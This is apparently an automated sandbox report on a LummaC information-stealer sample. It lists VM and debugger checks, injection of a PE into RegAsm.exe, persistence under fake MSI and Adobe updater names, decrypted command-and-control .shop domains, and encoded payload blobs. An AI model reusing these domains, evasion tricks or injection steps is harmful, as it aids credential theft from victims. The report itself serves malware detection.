ZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0VhpWbZdIcVFHnb3QBFJEgxwyQpCTte0yQjzn7uCUZsuA+iYIJO4a+Hmq+9ONtmOcMMY
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: tMO4FVIc9l.exe, 00000000.00000003.2153450957.000000000614B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}9+DtRuOIzpuPOHMWFCH4SYrrhIIF+VmRVSkbN671zwLeLYomOj6BxuG4WR0H8+Rivo4a5BAWT1bV5dHpshkYrOka+p8vn3VPA9qlgL8Tk27kWvHNRJXPl7UkYvCoDMNFU/36++C/jG6pgvhw/J6+PCmsW1ynBiLNzuR9AXJKT6RtkzVJ5JXS6W4LXIi22NeLtP7Ikk+0n7QDGjovSf2FNmrxFItlk5hpx/2HxYs7bUXx8wlhYhOe6vmYTYhwDGkC95TfsGbkuhMXPDu24Tk7yZ0vkv8IwoJIe02kWQ6IIm9jZj5kyhHMSGTfMV1KramijuIQ61Lh4JuwhDKy5sdv4lPBppbXLx9SLeTS6Kn4usBfnhOPZZ7l5cpc73VFZYd77s7LnUzNMXxxIpimnULqgLSaHyIqzMQjKsPItp3JQyx5CerGBHz+72bou4eRv4TJR7md171SZI7d8swF+mIEVAJCa+4QbnpduN+YKaqd+XlImpqvGTlKejMnbf5C3VoY6JqyIprHM127oDjSKid9WWwYkCjOIWoJ9cPNs1rEHZ7g0TIw+CKfhqUxdWSSZy1s0xEmvRteTep7wHsWEq3bric1I0yUTA1xPBeKNpfYj0KIFBfGvzhZMFqKcVarTu4qW7iA/0/ou6h8oRON7pvR/Drqz1sh2V/nTyeLJBoScoTC2kP+Z5joN7z4enaTfObIPJ73aAl7nk82ybN7HgXREVh9sTgLim/ZFJ5ILI8FVqHlTjEcHZYzg3iLhWWXwtL8duCV9PO06EahABTLaH/dJMlgRfEm+xqei1EiLMQRE1A3wjzPysQesfpyIP7QZIIOwr8Fac1720ciptOJHnqRhOYMUatUHgvBfyvSdxZFncyCHH8s5lxNPR9Ckhzt/OyLoXmbZmd7lnu+m7uljsgn0XpsdfOO+Hb6A8sp3Lny7Crg5eEH7FkVTGHF1dB5sUfLHUBgegCLm9az5mP4IHm53G3d6FaRVSjxbt/cmY1A4yoMWgbu753WBLmKf7XoP0a3ATliu2meo4ycXIQcFDZxSBsE/n8lIc9Rjs7JH9hU+UalUXvLlk3QUNIdExIuU0zLb9VKS5YYAUp8v1L58qp6JEfI2T1GH8BNpLTSa1mvlaKprJUJIpnWr30WVhfG1wRno7Ou3cF2tpP3xF2pkOU5vy86XhhyxlqE9HTLQYUMojgV8q9ODzUXLbxWzK/ZKI3rkrIGFkZmRdr0WffmX91WbitQH63DCEnQ3rutG1DBIXV73QYXkiqmMW8Vu+F6IYaFLPFibpYCvWdqa5euzm4wASrFl7hx59wixe916VrWor7/LR1RwbfRM3ZDHiA9d+r6uLhAvkHE/7GY8XhfjaF3eiso7gDvw56tlyKHcJ9locNvwwauttSLO9tH2h4ABpfxVeWp5cNhRjml3ecGiVDs4vikm7dU4OOrv4FdDu3621TEC0ZAvx3cJzKlwVHqcJLgEQoOC9dwoKN8VJSL1Uo6cd8X/oURNbmKMNyh3jqv8o3J29EtLi4ZBGlmf8ljmlqYy97XCx4/+XmHd8a7VK/ZK+ox1GWo1ve2zhapCJZntBNUx2+Ab5E8v7CAFVcOpXvV+AAAxe3TeLs943LDxb4iTGvD6fIRB4J6ZR6jI+EPw959sgDkaVvANG7Nr72KQ8LuBIgyQfqf+m+iHiUj4SLub8eUbGXr45sj5eH6SVxU0CxrdR34NEWUjCII5KmpCckr5zRxXbaffxgnZdm2vKKO081W1smR0p8/nOBzQ8DI3feQCIChRSRIOORV9wT6RphUcA0b4nNYsG/2swVxRBK8YOLh3g0mmEmUKjzBNi369LJUIgTx1nP/O
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.15.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: tMO4FVIc9l.exe, 00000000.00000003.2148941162.0000000006135000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2148994056.000000000613C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: ZvP9NIG0u2hrWeb Data.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: RegAsm.exe, 00000015.00000002.2456254141.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWB

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Code function: 0_2_00A6400F rdtsc

0_2_00A6400F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00436340 LdrInitializeThunk,

12_2_00436340

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe

Code function: 7_2_004E8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_004E8CD3

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004EC11D mov ecx, dword ptr fs:[00000030h]	7_2_004EC11D
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004F53CE mov eax, dword ptr fs:[00000030h]	7_2_004F53CE
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BFC11D mov ecx, dword ptr fs:[00000030h]	9_2_00BFC11D
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00C053CE mov eax, dword ptr fs:[00000030h]	9_2_00C053CE
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E9C11D mov ecx, dword ptr fs:[00000030h]	17_2_00E9C11D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00EA53CE mov eax, dword ptr fs:[00000030h]	17_2_00EA53CE
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E9C11D mov ecx, dword ptr fs:[00000030h]	20_2_00E9C11D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00EA53CE mov eax, dword ptr fs:[00000030h]	20_2_00EA53CE

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe

Code function: 7_2_004F79CD GetProcessHeap,

7_2_004F79CD

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004E8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004E8CD3
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004E4D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_004E4D66
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004E4EC2 SetUnhandledExceptionFilter,	7_2_004E4EC2
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004E4FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_004E4FF9
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BF8CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00BF8CD3
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BF4D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00BF4D66
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BF4EC2 SetUnhandledExceptionFilter,	9_2_00BF4EC2
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00BF4FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00BF4FF9
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E98CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00E98CD3
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E94D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00E94D66
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E94EC2 SetUnhandledExceptionFilter,	17_2_00E94EC2
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00E94FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00E94FF9
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E98CD3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00E98CD3
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E94D66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00E94D66
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E94EC2 SetUnhandledExceptionFilter,	20_2_00E94EC2
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00E94FF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_00E94FF9

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe

Code function: 7_2_00C4018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

7_2_00C4018D

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: roomabolishsnifftwk.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: civilianurinedtsraov.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: stalfbaclcalorieeis.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: employhabragaomlsp.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: femininiespywageg.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: averageaattractiionsl.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: buttockdecarderwiso.shop
Source: xq6J5KlULX6jlR3rET0T.exe, 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: museumtespaceorsp.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6DE008	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
